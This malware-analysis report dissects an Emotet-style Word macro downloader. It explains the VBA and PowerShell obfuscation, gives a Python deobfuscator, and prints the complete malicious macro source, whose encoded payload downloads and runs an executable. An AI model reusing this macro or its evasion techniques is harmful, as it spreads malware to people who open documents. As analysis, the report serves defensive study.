Malware Insights
The sample carries a VBA macro whose AutoOpen routine ends in a Shell() call that launches PowerShell. The command never exists as one string in the source: five helper functions (CWqiKVjzwIw, amNPIo, ktzAKOu, wHaMwdHDdw and tqYSzIdHqlW) concatenate dozens of short literals, interleaved with junk assignments (CDate, CByte, Sin over variables that are never assigned). Because every procedure runs under On Error Resume Next and the unassigned names are Empty, the junk contributes nothing and Chr(GJjXH + 80 + EkOcEiHvHj) reduces to Chr(80), the leading "P". Joining the literals in order gives (encoded payload abbreviated):

POwerSHell . ( $VErBoSeprefEREnCE.tOStRInG()[1,3]+'X'-JOIN'')( ('21F70e94P88Z114e121P91r17F12P17F95w84@70l28r94l83w91_84P82F69G17r67@80l95P85l94G92@10...84F10w76P76'.SplIt('FG@rw_lPZe' )|% {[Char]( $_-BxOr '0x31' )})-Join '' )

Two obfuscation layers follow. $VerbosePreference.ToString() is "SilentlyContinue" in a default session; elements 1 and 3 are 'i' and 'e', and appending 'X' yields "ieX", so the call operator invokes Invoke-Expression without the string iex ever appearing in the document. Its argument is a run of decimal numbers separated by the ten delimiter characters F, G, @, r, w, _, l, P, Z and e; each number is XORed with 0x31 and cast to [Char]. Decoding yields a PowerShell downloader that creates a System.Net.WebClient and a Random object, splits a hard-coded list of URLs on '@', builds a random-named .exe path under $env:temp, and for each URL attempts DownloadFile followed by Start-Process, breaking after the first success. That is the Emotet first-stage document behaviour, and the ClamAV signature Doc.Downloader.Emotet-6878585-0 agrees. The decoded URLs, not the DrawingML schema URL listed under Embedded URL, are the network indicators worth extracting.
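The decoding described above, reproduced as an added worked example. This Python is not the analyzer's code or part of the sample; the VBA identifiers are the sample's, the Python names are mine. Its only input is the set of string-building assignments copied from the macros.bas preview below (constructed here as an inline string), so it runs offline; the printed stage-one script contains the download URLs, which the summary above deliberately leaves out.

```python
"""Static deobfuscation of the macro above: (1) replay the VBA string assembly,
(2) resolve the $VerbosePreference 'iex' trick, (3) decode the Split/-bxor payload.
Added example; not part of the analyzer output or the sample."""
import re

# Constructed input: string-building assignments copied verbatim from the macros.bas
# preview on this page, plus one padding line (jHRjQ) to show it evaluates to "".
VBA_SNIPPET = r'''
jHRjQ = CDate(TLqnH + Sin(37310 + 41363) * 25455 * CInt(6068))
DizHtnk = "OwerSHe" + "ll " + ". " + "( " + "$VErBoS" + "eprefEREnCE"
djUAjOX = ".tOStRI" + "nG()[1,3]" + "+'X'" + "-JOIN'')("
KHPjUcwpYPU = " ('21" + "F70e9" + "4P88Z114e121P91" + "r17F12P17F95w84" + "@70l" + "28r94l83w91_84" + "P82F69G1"
rPjKhISTXSj = "7r6" + "7@80l" + "95P85l" + "94G92@10@21G1" + "19F" + "75r103G71l" + "101@10" + "0F17P" + "12_1"
StbXGlIvONn = "7@" + "95Z84w70@28r9" + "4l83P91@84F8" + "2G69l17G98l72r6" + "6Z69_84Z92" + "r31w1" + "27F84F" + "69@31e102_84e" + "83F114l93P88_84"
dDvrlZJQiMs = "l95Z69F10r21w" + "103_127l7" + "5@95F11" + "8e17@12w" + "17Z2" + "2P8"
jwDfQzXfnz = "9r69_69w6" + "5r11Z30Z30" + "P90l67G68" + "l87G86_64l66w65"
vAWXQTXpUX = "l31P" + "82e94@9" + "2@30G123_8Z121" + "P9w" + "91e30F" + "113@89@6" + "9P69e65e11r3" + "0Z30Z93w84_"
pBOPfDIRLS = "89P68@68G89_88G" + "84F68F31@82e9" + "4@92@" + "30G114Z9" + "9_93w101l88" + "@70Z100e30@11" + "3w89" + "e69r69@65@" + "11w30_30@"
pWwPz = "85P80w88_89@" + "80@6" + "9Z66Z68G80e67e" + "92Z80P85@80P65Z" + "68w67F70@94r90"
CWqiKVjzwIw = DizHtnk + djUAjOX + KHPjUcwpYPU + rPjKhISTXSj + StbXGlIvONn + dDvrlZJQiMs + jwDfQzXfnz + vAWXQTXpUX + pBOPfDIRLS + pWwPz
PYOcd = "l84" + "@67F69@94G31F82" + "F94@92" + "F30e5@" + "87" + "l114@72l2F" + "70@" + "112_"
YRcBVki = "30e113" + "e89@69F69" + "@65" + "P11Z30r" + "30_"
iArFZcc = "3F1Z3w31_7_2e" + "31_0" + "G1l4w31F9l7" + "e30l112Z" + "91P120l1"
FaDTEQvtwf = "26_94G97P30@11" + "3w89w69e69" + "_65@11" + "F3"
jqfkZ = "0G30e70Z70r7" + "0l31P92" + "F80l69@88l95r3" + "P5@31r67@6" + "8@30F7" + "0l82l87G8" + "4l105_97Z"
wZLFDJKwl = "30l22G31_98w" + "65l93F8" + "8e69@25r22l" + "11" + "3_22Z" + "24r10"
kLwOJzEoo = "_21l122r104r11" + "2G98G64F70l17" + "P12P17l21@70F94" + "w88G114" + "Z12" + "1F91l31F95" + "G84_73@69@25w" + "0_29F17l" + "9F5w1Z9@8w2e" + "24@10P2"
amNPIo = PYOcd + YRcBVki + iArFZcc + FaDTEQvtwf + jqfkZ + wZLFDJKwl + kLwOJzEoo
EIBrNAGlvKf = "1l93F1" + "26_116P123P9" + "8e17r12" + "F17w21l8"
VsRbbMo = "4G95G71Z11G69" + "w84@92" + "w65r17@26G17" + "@2" + "2G109@" + "22e17@26l1" + "7Z2" + "1G122" + "_104w112_98w64" + "r70@17F2"
SGDwwEtwvj = "6e17w22l" + "31e84P" + "73F84G22e1" + "0G87Z94_67" + "w84@80@82" + "G89" + "G25Z21F" + "70e107" + "@99w107_103F1"
WvwwDtEFACk = "7l88r95G1" + "7r21Z" + "103P127@75w95w" + "118r24w74" + "r69" + "e67Z72Z74l21" + "w119r75@103P71l" + "101G100G3"
RbVLLbMZ = "1l117P94_" + "70r95w93Z94F80w" + "85" + "w119P88_9" + "3l84_25F21e70" + "r107G99Z107F103" + "P3" + "1w101_94e98" + "l69Z67F8"
pqRizN = "8@95_86@25P" + "24r29Z17@2" + "1l93F126_11" + "6F123Z98G24"
uffOkwcjRDS = "l10w" + "98_69e80Z67" + "F69P28Z97l67r9" + "4_82w84F6" + "6P66P17w21@93w" + "126w116@123P9" + "8e" + "10Z8"
bVZXVbkz = "3F67w84l80e90G1" + "0e76F82e80" + "F69@82e89G74w70" + "r67w88F69Z84Z28" + "r89@94P66F69r1"
ODnWCpCXai = "7G21G110G31w1" + "16l7" + "3Z82_84e65l69@8" + "8l94G95_31e1" + "24e84w66l6" + "6r80w" + "86Z84F1" + "0w7" + "6P76'.Spl"
ktzAKOu = EIBrNAGlvKf + VsRbbMo + SGDwwEtwvj + WvwwDtEFACk + RbVLLbMZ + pqRizN + uffOkwcjRDS + bVZXVbkz + ODnWCpCXai
YpNqKw = "It('F" + "G@rw_lPZe' )|%" + " {[Char]( $_-B" + "xOr '0x31' " + ")})-Joi"
WvpMOOQl = "n '' )"
wHaMwdHDdw = YpNqKw + WvpMOOQl
zozIiAohQm = zpFsEMD + Chr(GJjXH + 80 + EkOcEiHvHj)
tqYSzIdHqlW = rVqwvJijSwT + zozIiAohQm + CWqiKVjzwIw + amNPIo + ktzAKOu + wHaMwdHDdw
'''

ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.*\S)\s*$")
TOKEN = re.compile(r'"([^"]*)"|([A-Za-z_]\w*)')  # string literal | identifier
CHR_CALL = re.compile(r"Chr\(([^()]*)\)", re.I)


def emulate_vba_concat(source):
    """Replay assignments in order with '+' as concatenation. Never-assigned names
    are VBA Empty ("" in concatenation, 0 in arithmetic; On Error Resume Next hides
    any mismatch), so CDate/CByte/Sin padding vanishes and Chr(a + 80 + b) is Chr(80).
    Bare numeric literals are dropped; no string-building line here uses one."""
    env = {}
    for line in source.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        rhs = CHR_CALL.sub(lambda c: '"%s"' % chr(sum(map(int, re.findall(r"\d+", c.group(1))))),
                           m.group(2))
        env[m.group(1).lower()] = "".join(lit if not ident else env.get(ident.lower(), "")
                                          for lit, ident in TOKEN.findall(rhs))
    return env


PREF_ALIAS = re.compile(r"\$VerbosePreference\.ToString\(\)\[([\d,]+)\]\+'([^']*)'-join''", re.I)


def resolve_preference_alias(command):
    """$VerbosePreference.ToString() is 'SilentlyContinue' in a default session;
    [1,3] picks 'i','e' and +'X' -join '' gives 'ieX', i.e. Invoke-Expression."""
    pick = lambda m: "".join("SilentlyContinue"[int(i)] for i in m.group(1).split(",")) + m.group(2)
    return PREF_ALIAS.sub(pick, command)


XOR_PAYLOAD = re.compile(r"\('([^']+)'\.Split\('([^']+)'\s*\)\s*\|\s*%\s*\{\s*\[Char\]\(\s*\$_\s*-bxor\s*"
                         r"'0x([0-9a-f]+)'\s*\)\s*\}\s*\)", re.I)


def decode_xor_payload(command):
    """Emulate ('n1Xn2Y'.Split('XY') | % {[Char]($_ -bxor 0xKK)}) -join ''. Windows
    PowerShell binds Split('...') to Split(char[]): every character of the argument
    is a separator. Empty tokens from adjacent separators are skipped."""
    m = XOR_PAYLOAD.search(command)
    if not m:
        raise ValueError("Split/-bxor payload not found")
    numbers, seps, key = m.group(1), m.group(2), int(m.group(3), 16)
    return "".join(chr(int(t) ^ key) for t in re.split("[%s]" % re.escape(seps), numbers) if t)


def deobfuscate(source):
    """Return (Shell() command line, same with 'iex' resolved, decoded stage-1 script)."""
    command = emulate_vba_concat(source)["tqyszidhqlw"]  # value AutoOpen passes via Application.Run
    return command, resolve_preference_alias(command), decode_xor_payload(command)


if __name__ == "__main__":
    for part in deobfuscate(VBA_SNIPPET):
        print(part, "\n")
```

One caveat when reproducing the last step in a live shell rather than in Python: the sample relies on Windows PowerShell resolving .Split('FG@rw_lPZe') to the char[] overload. PowerShell 7 prefers the String.Split(string) overload and would split on the whole ten-character substring, so the payload would not decode there unless the argument is cast with [char[]].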
Heuristics (7)

- ClamAV: Doc.Downloader.Emotet-6878585-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.Emotet-6878585-0.
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings). Document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL). Matched lines in script:
      VWOMi = CDate(86711)
      HKABno = kKFriWbGzhM + Shell(EipUXVCEt + KQMIblIjO + DJXiAYiIzt, 11856 - 11856)
      soYlz = LzAZvq
  KQMIblIjO is the parameter of IkVMfoIB and carries the assembled PowerShell command; the names on either side of it are never assigned and evaluate to Empty, as do the two padding lines. The window-style argument 11856 - 11856 is 0 (vbHide), so the PowerShell window is never displayed.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched lines in script:
      End Function
      Sub AutoOpen()
      On Error Resume Next
  AutoOpen does not call Shell() itself. It calls Application.Run with a macro name assembled as WbzVtaK + "IkVMfoIB" + zhnmfliSpc (both outer names are Empty) and passes the return value of tqYSzIdHqlW as the argument, so the auto-exec entry point and the Shell() call are only linked at run time.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the "no modern VBA project was recovered" clause is contradicted by the extracted macros.bas below; treat the finding as redundant with OLE_VBA_AUTOOPEN.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
      URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  This is the standard DrawingML XML namespace URI, not a network indicator. The sample's download URLs sit inside the XOR-encoded PowerShell payload and never appear in plaintext, so URL extraction does not see them.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10922 bytes | d5651a954127d0143cbfee8faf12ee7f2f51be7c0e331b49e9d2f9c2b273fb46 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "MwvQXlFYLAM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "TWsSKiaVwtTDK"
Function CWqiKVjzwIw()
On Error Resume Next
istiG = 56728
jHRjQ = CDate(TLqnH + Sin(37310 + 41363) * 25455 * CInt(6068))
DaIcE = pPjjGi
ikKiY = CDate(27474)
BbJrL = CByte(vitsKh)
MooXRt = 44754
DizHtnk = "OwerSHe" + "ll " + ". " + "( " + "$VErBoS" + "eprefEREnCE"
CpddLW = 5245
uOoPj = CDate(wdzFz + Sin(37873 + 98856) * 67727 * CInt(59444))
UzzcYo = ttkbHX
CCkBp = CDate(12949)
krLGf = CByte(GEPlMs)
JaaDik = 78465
djUAjOX = ".tOStRI" + "nG()[1,3]" + "+'X'" + "-JOIN'')("
HiDWLO = 52525
XImYc = CDate(wviTFA + Sin(84042 + 85632) * 70115 * CInt(18596))
AwzpEl = aYomW
hqFICI = CDate(80707)
tjXNPB = CByte(inGkvV)
XWdcFK = 76649
KHPjUcwpYPU = " ('21" + "F70e9" + "4P88Z114e121P91" + "r17F12P17F95w84" + "@70l" + "28r94l83w91_84" + "P82F69G1"
EPYmHk = 26852
zUhVik = CDate(kTzhUR + Sin(10318 + 33061) * 99517 * CInt(61745))
PFUMqs = wsUZTS
zEoMYm = CDate(23080)
HoGwh = CByte(KqjTW)
YNfrXQ = 80902
rPjKhISTXSj = "7r6" + "7@80l" + "95P85l" + "94G92@10@21G1" + "19F" + "75r103G71l" + "101@10" + "0F17P" + "12_1"
plMLI = 92768
isvMRf = CDate(pIGqiA + Sin(64244 + 71454) * 75346 * CInt(39442))
wJnIS = bFTOW
HLAfwQ = CDate(3089)
nojwXG = CByte(kipdm)
aZXilB = 26475
StbXGlIvONn = "7@" + "95Z84w70@28r9" + "4l83P91@84F8" + "2G69l17G98l72r6" + "6Z69_84Z92" + "r31w1" + "27F84F" + "69@31e102_84e" + "83F114l93P88_84"
RRjhBA = 71776
pZoCi = CDate(Wzrmj + Sin(36397 + 46462) * 27597 * CInt(86833))
JsHTUR = WvBsPd
MMhSEQ = CDate(8549)
DrZaNK = CByte(RrtWZo)
mFbKvW = 66637
dDvrlZJQiMs = "l95Z69F10r21w" + "103_127l7" + "5@95F11" + "8e17@12w" + "17Z2" + "2P8"
nXnQX = 73569
SjqMs = CDate(zQjZb + Sin(29244 + 2201) * 62903 * CInt(50274))
uwkUFI = fiNSEu
GhQHV = CDate(28674)
VMwStI = CByte(JkBXn)
cYusC = 70376
jwDfQzXfnz = "9r69_69w6" + "5r11Z30Z30" + "P90l67G68" + "l87G86_64l66w65"
OYzZV = 62794
EclInT = CDate(VtKLi + Sin(75543 + 10822) * 41182 * CInt(52538))
XCmbms = OBKDv
LiijvV = CDate(51055)
ZImlj = CByte(VLkuOJ)
laqJu = 49954
vAWXQTXpUX = "l31P" + "82e94@9" + "2@30G123_8Z121" + "P9w" + "91e30F" + "113@89@6" + "9P69e65e11r3" + "0Z30Z93w84_"
PHQEn = 33731
mjNkoa = CDate(fiZlv + Sin(16550 + 95637) * 77241 * CInt(7681))
qsErF = PCzRi
jumIFZ = CDate(74540)
DazFMD = CByte(XTnKS)
csYMp = 82608
pBOPfDIRLS = "89P68@68G89_88G" + "84F68F31@82e9" + "4@92@" + "30G114Z9" + "9_93w101l88" + "@70Z100e30@11" + "3w89" + "e69r69@65@" + "11w30_30@"
UbSavD = 61774
SVrUj = CDate(UjSOHw + Sin(32044 + 95852) * 81083 * CInt(60252))
fcXLs = WilTln
whrIW = CDate(48386)
YXalG = CByte(EOhhFj)
jVYdzs = 79010
pWwPz = "85P80w88_89@" + "80@6" + "9Z66Z68G80e67e" + "92Z80P85@80P65Z" + "68w67F70@94r90"
CWqiKVjzwIw = DizHtnk + djUAjOX + KHPjUcwpYPU + rPjKhISTXSj + StbXGlIvONn + dDvrlZJQiMs + jwDfQzXfnz + vAWXQTXpUX + pBOPfDIRLS + pWwPz
End Function
Function amNPIo()
On Error Resume Next
KYuaa = 45073
pCmzQZ = CDate(JrwQv + Sin(54020 + 41163) * 87511 * CInt(54847))
LrhRYV = LTKfi
vdjwmu = CDate(61036)
GPZICV = CByte(tBCZmU)
FIOUw = 35596
PYOcd = "l84" + "@67F69@94G31F82" + "F94@92" + "F30e5@" + "87" + "l114@72l2F" + "70@" + "112_"
NrqiXI = 58253
sBBvWG = CDate(FoHZNs + Sin(89997 + 74137) * 16941 * CInt(71165))
YLjVwL = qAPIn
VnwPoi = CDate(37450)
WYKZkG = CByte(bCzOR)
DFDar = 21047
YRcBVki = "30e113" + "e89@69F69" + "@65" + "P11Z30r" + "30_"
XNUch = 71242
CQOAG = CDate(YhOHGW + Sin(10901 + 6114) * 49485 * CInt(27569))
JsHjm = TSriu
fGRzAV = CDate(23266)
naBoi = CByte(GHDWEp)
AiVOq = 78825
iArFZcc = "3F1Z3w31_7_2e" + "31_0" + "G1l4w31F9l7" + "e30l112Z" + "91P120l1"
GIOEGw = 42872
qtmtY = CDate(Pbfmj + Sin(47855 + 17944) * 94549 * CInt(84937))
zLGNK = XrXuVB
IvhOz = CDate(57910)
PzTjcj = CByte(dqcFm)
moXMi = 51097
FaDTEQvtwf = "26_94G97P30@11" + "3w89w69e69" + "_65@11" + "F3"
iMCqZ = 51894
dSUCw = CDate(LaDww + Sin(67202 + 90316) * 36188 * CInt(90861))
RCkSZF = nzAAP
VvWdwO = CDate(70714)
wjdSQ = CByte(hDrQJ)
ZIJQb = 96508
jqfkZ = "0G30e70Z70r7" + "0l31P92" + "F80l69@88l95r3" + "P5@31r67@6" + "8@30F7" + "0l82l87G8" + "4l105_97Z"
QjbKZ = 65418
usVrRj = CDate(ipFSEd + Sin(38369 + 44384) * 96385 * CInt(94875))
YSSYX = CiiVW
hEzVwX = CDate(47703)
TaCDzi = CByte(uiSzY)
LaUuNG = 841
wZLFDJKwl = "30l22G31_98w" + "65l93F8" + "8e69@25r22l" + "11" + "3_22Z" + "24r10"
YZzqw = 35382
TupRmj = CDate(zFjKsj + Sin(33024 + 32491) * 77004 * CInt(44509))
jkVsC = lWAvz
iCVLPo = CDate(67770)
TRNhzY = CByte(wGRWUv)
LizUMo = 25959
kLwOJzEoo = "_21l122r104r11" + "2G98G64F70l17" + "P12P17l21@70F94" + "w88G114" + "Z12" + "1F91l31F95" + "G84_73@69@25w" + "0_29F17l" + "9F5w1Z9@8w2e" + "24@10P2"
amNPIo = PYOcd + YRcBVki + iArFZcc + FaDTEQvtwf + jqfkZ + wZLFDJKwl + kLwOJzEoo
End Function
Function ktzAKOu()
On Error Resume Next
LGcYHN = 97294
vsSwvo = CDate(jMLjP + Sin(6562 + 65682) * 30980 * CInt(67325))
SMKUw = XaRCWT
fQjfzE = CDate(20430)
DFRlh = CByte(OEwIas)
imAYJL = 74942
EIBrNAGlvKf = "1l93F1" + "26_116P123P9" + "8e17r12" + "F17w21l8"
SwUpt = 45078
aCkXjM = CDate(wMmdz + Sin(86496 + 9654) * 42589 * CInt(42779))
jObHL = DOHNG
mtPTAZ = CDate(75759)
YzzzUf = CByte(ARwKvY)
lzzVmw = 89411
VsRbbMo = "4G95G71Z11G69" + "w84@92" + "w65r17@26G17" + "@2" + "2G109@" + "22e17@26l1" + "7Z2" + "1G122" + "_104w112_98w64" + "r70@17F2"
ZpiJRl = 98870
IIzhZJ = CDate(himpci + Sin(72377 + 77453) * 43223 * CInt(62926))
MWcJdW = zjoZj
jIYzEs = CDate(88338)
RaljX = CByte(vTLLWO)
NzwfpS = 68384
SGDwwEtwvj = "6e17w22l" + "31e84P" + "73F84G22e1" + "0G87Z94_67" + "w84@80@82" + "G89" + "G25Z21F" + "70e107" + "@99w107_103F1"
XRzZTz = 33809
bWkhkc = CDate(rjEpW + Sin(53055 + 71229) * 39357 * CInt(45459))
OtSVL = IaVHkd
clHBBP = CDate(74205)
vUCSV = CByte(XNwfcY)
kVlcZh = 73526
WvwwDtEFACk = "7l88r95G1" + "7r21Z" + "103P127@75w95w" + "118r24w74" + "r69" + "e67Z72Z74l21" + "w119r75@103P71l" + "101G100G3"
ILuQi = 96947
XCRWG = CDate(ipwztL + Sin(40127 + 48104) * 41321 * CInt(29695))
tmluf = CNpiVi
PVRNG = CDate(62992)
ArQkn = CByte(WUaQkb)
kDVVRa = 76810
RbVLLbMZ = "1l117P94_" + "70r95w93Z94F80w" + "85" + "w119P88_9" + "3l84_25F21e70" + "r107G99Z107F103" + "P3" + "1w101_94e98" + "l69Z67F8"
ZijpI = 5165
iQEuXp = CDate(PccOI + Sin(47042 + 59868) * 76276 * CInt(66554))
ccGprw = nvKkNL
JQwIH = CDate(85354)
ZHhtF = CByte(TTvcrC)
uiKIjX = 51404
pqRizN = "8@95_86@25P" + "24r29Z17@2" + "1l93F126_11" + "6F123Z98G24"
ZFpuqB = 83951
pffJFM = CDate(lBfZER + Sin(51259 + 27529) * 61510 * CInt(19477))
usiwp = juljCZ
ioBQco = CDate(57304)
ikWhBf = CByte(lBqSQH)
WQYEqT = 27735
uffOkwcjRDS = "l10w" + "98_69e80Z67" + "F69P28Z97l67r9" + "4_82w84F6" + "6P66P17w21@93w" + "126w116@123P9" + "8e" + "10Z8"
NwqDjX = 5826
bjXiSu = CDate(pRJCvd + Sin(70313 + 65453) * 18085 * CInt(63000))
ifUjD = INPsF
awibo = CDate(99706)
DaVGI = CByte(kGrptd)
SDQonq = 5416
bVZXVbkz = "3F67w84l80e90G1" + "0e76F82e80" + "F69@82e89G74w70" + "r67w88F69Z84Z28" + "r89@94P66F69r1"
kMEkht = 52049
EZBKG = CDate(iUMYuW + Sin(29559 + 19376) * 25296 * CInt(78599))
RjFrW = ruhVj
Eiijj = CDate(92894)
AasoBI = CByte(UirdV)
oOSvoh = 73554
ODnWCpCXai = "7G21G110G31w1" + "16l7" + "3Z82_84e65l69@8" + "8l94G95_31e1" + "24e84w66l6" + "6r80w" + "86Z84F1" + "0w7" + "6P76'.Spl"
ktzAKOu = EIBrNAGlvKf + VsRbbMo + SGDwwEtwvj + WvwwDtEFACk + RbVLLbMZ + pqRizN + uffOkwcjRDS + bVZXVbkz + ODnWCpCXai
End Function
Function wHaMwdHDdw()
On Error Resume Next
hBfuGV = 47328
MqlhQm = CDate(TjTcF + Sin(28335 + 35880) * 89207 * CInt(74902))
JstCuA = ULaOQJ
KQZTv = CDate(70463)
wHGLr = CByte(hRDqNh)
hiMdm = 15054
YpNqKw = "It('F" + "G@rw_lPZe' )|%" + " {[Char]( $_-B" + "xOr '0x31' " + ")})-Joi"
IKTDj = 18336
DjYnRC = CDate(mTnLQ + Sin(60936 + 24735) * 85654 * CInt(85334))
nKjiKF = RiLqtY
ELBCa = CDate(50266)
iPdwJ = CByte(rZRpr)
FZOikO = 14675
WvpMOOQl = "n '' )"
wHaMwdHDdw = YpNqKw + WvpMOOQl
End Function
Function RiERIQspNMP()
On Error Resume Next
iJmIz = CDate(VQBIQ + Sin(79735 + 20276) * 18445 * CInt(37384))
ZdUjt = CDate(35303)
STbppI = RAEvod
DSzrD = CByte(jnBCCG)
ZiFDi = 88574
GZFXY = 54791
mjHiZu = CDate(ZaaZWz + Sin(62356 + 75333) * 18278 * CInt(91069))
IsGjn = CDate(92841)
aDMMdT = cLiAu
NvAFCB = CByte(RcjVR)
cqJwdo = 42331
qtBPPm = 86498
jphJVZ = CDate(SiYUb + Sin(19463 + 18306) * 20415 * CInt(43658))
wjtYf = CDate(84353)
RjlPz = YXAAjY
oVjLz = CByte(sWaGn)
PMJLTd = 12636
HZnrBJ = 98994
ozLAI = Ddkbz
IRwqh = CDate(CDzpU + Sin(69335 + 78314) * 36016 * CInt(84882))
OlvuN = 96970
tMcAP = 79931
idMlM = CByte(HwGiiB)
mUYSu = CDate(97010)
ivcHS = pFwKQ
NUUzVi = CDate(StPXER + Sin(73540 + 31354) * 73514 * CInt(26908))
NfVEwd = 7106
dAtNDs = 57159
QNwNqu = CByte(kUizAr)
UFGTd = CDate(19305)
End Function
Function tqYSzIdHqlW()
On Error Resume Next
wFQBf = wqaEF
XLEiXI = CDate(kPpKfw + Sin(82504 + 87739) * 60459 * CInt(43601))
VPGSb = 36984
YPjhDk = 42174
vacETs = CByte(wOIGC)
JPfhC = CDate(90738)
zozIiAohQm = zpFsEMD + Chr(GJjXH + 80 + EkOcEiHvHj)
wJrNhE = Hzcww
RnJJdZ = CDate(NpRGGW + Sin(74091 + 27214) * 76438 * CInt(41290))
jKsbjZ = 96871
IDbmY = 13743
DMQkJa = CByte(pUVjz)
hivffQ = CDate(89896)
nzqSTi = CoJaL
uzpju = CDate(woPhci + Sin(58560 + 83710) * 8561 * CInt(17468))
fBUbfE = 49927
nrcpU = 90230
PuTIJE = CByte(lIDGE)
WaIRsN = CDate(95341)
tqYSzIdHqlW = rVqwvJijSwT + zozIiAohQm + CWqiKVjzwIw + amNPIo + ktzAKOu + wHaMwdHDdw
FMihdU = sdHzI
lCpWJi = CDate(YpUVa + Sin(23999 + 78947) * 53841 * CInt(61315))
bOJVws = 42669
zTnbr = 46721
aIiVzc = CByte(NHkbR)
iGlVd = CDate(9057)
End Function
Function IkVMfoIB(KQMIblIjO)
On Error Resume Next
ZuhSi = ROjri
CmkzD = CDate(XsrSA + Sin(11362 + 64995) * 80061 * CInt(84137))
HMUPh = 45675
jzARGS = 23682
OBEhCa = CByte(QQWMI)
kdfXPP = CDate(32793)
rnrZzf = HfMtzW
tSjzP = CDate(dEowTj + Sin(20465 + 56271) * 25012 * CInt(4835))
TkwNj = 46233
jqLfmd = 5810
EMCzu = CByte(HzUiwm)
VWOMi = CDate(86711)
HKABno = kKFriWbGzhM + Shell(EipUXVCEt + KQMIblIjO + DJXiAYiIzt, 11856 - 11856)
soYlz = LzAZvq
zaZiHV = CDate(XrHVsE + Sin(79932 + 71457) * 57791 * CInt(80114))
RJCIYO = 30189
iWcZh = 88840
WITjUq = CByte(ntmzr)
RjHSKk = CDate(86091)
End Function
Sub AutoOpen()
On Error Resume Next
RNUmTB = FzkEz
VbQDjn = CDate(XWIjT + Sin(96805 + 24787) * 38680 * CInt(48494))
NVSQC = 60918
nBmnd = 7933
wfbwdc = CByte(rDaLbw)
IVJcA = CDate(87309)
Application.Run WbzVtaK + "IkVMfoIB" + zhnmfliSpc, kjAwHwUEW + tqYSzIdHqlW + criSL
ziQEad = NjbiH
UhhKj = CDate(OfYXi + Sin(35812 + 72490) * 68704 * CInt(70061))
utppT = 64254
HmqwUz = 90678
cIzFn = CByte(iKnZEC)
DwlCw = CDate(45440)
End Sub